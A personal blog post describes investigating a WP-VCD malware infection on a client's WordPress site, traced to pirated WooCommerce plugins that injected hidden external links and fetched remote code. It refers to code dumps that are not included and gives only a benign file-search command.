While recently maintaining a wordpress website for a client I came across a weird piece of code which caught my attention:
I was able to see this referenced script through my personal web crawler: Kraken
The tool is not yet available to public as I am finishing a few touches but here is the part of the report generated:
Here were a few of the domains which were randomly added to pages:
Here is a pastebin of the formatted code recovered from the dolohen domain:
I noticed pretty fast that the first strings set in the variable a was encoded in base64. Running a small loop I reversed the strings and as you can see in the list in this pastebin:
Back to the infection
Knowing quite well how the wordpress ecosystem functions I started going to see what could have changed in the files. I ran the following command:
find . -type f -mtime -10
So I could see all the created files in the pas 10 days. I noticed that a few files had been added to my wp-includes folder.
Looking at the code in those files I noticed a lot of code which was calling external urls or trying to inject data to the database.
At this point I knew the website had be compromised. I ran a plugin scan and detected two plugins that were harmful to the website:
- woocommerce cost of goods
- woocommerce customer order csv export
From here on I have kept investigating to find more and more code that those plugin injected. In a way it is pretty smart as the external links are only added if the user isn’t part of managing team.
Looking at WP-VCD
Some of the code execute through those plugins were set into a file called:
Here is a copy of the file:
By drecrypting the first base64 string installcode we can clearly see the malicious intent of the code. Here is a copy of the installcode reversed:
From this install code we can clearly see how it sends a request to a domain to get code (line 69) which is later written into a file.
We can see in the install code how it clearly creates the following file:
Here is a dump of the said file
Having later checked and compared with backups and checking logs and file information and more i’m pretty sure it would come from those plugins as this was the only actions the client took in those recent days looking at the event.
Upon further investigation I can’t verify from which source the plugins were downloaded but this is a clear example on why companies should take time to analyze their needs and not hesitate to pay for desired functionnalities instead of going to shady sources.
The results of wanting to save a few dollars ended up in a wide infection of the platform which resulted in many hours of meticulous analysis to clean and make the platform functionnal once more.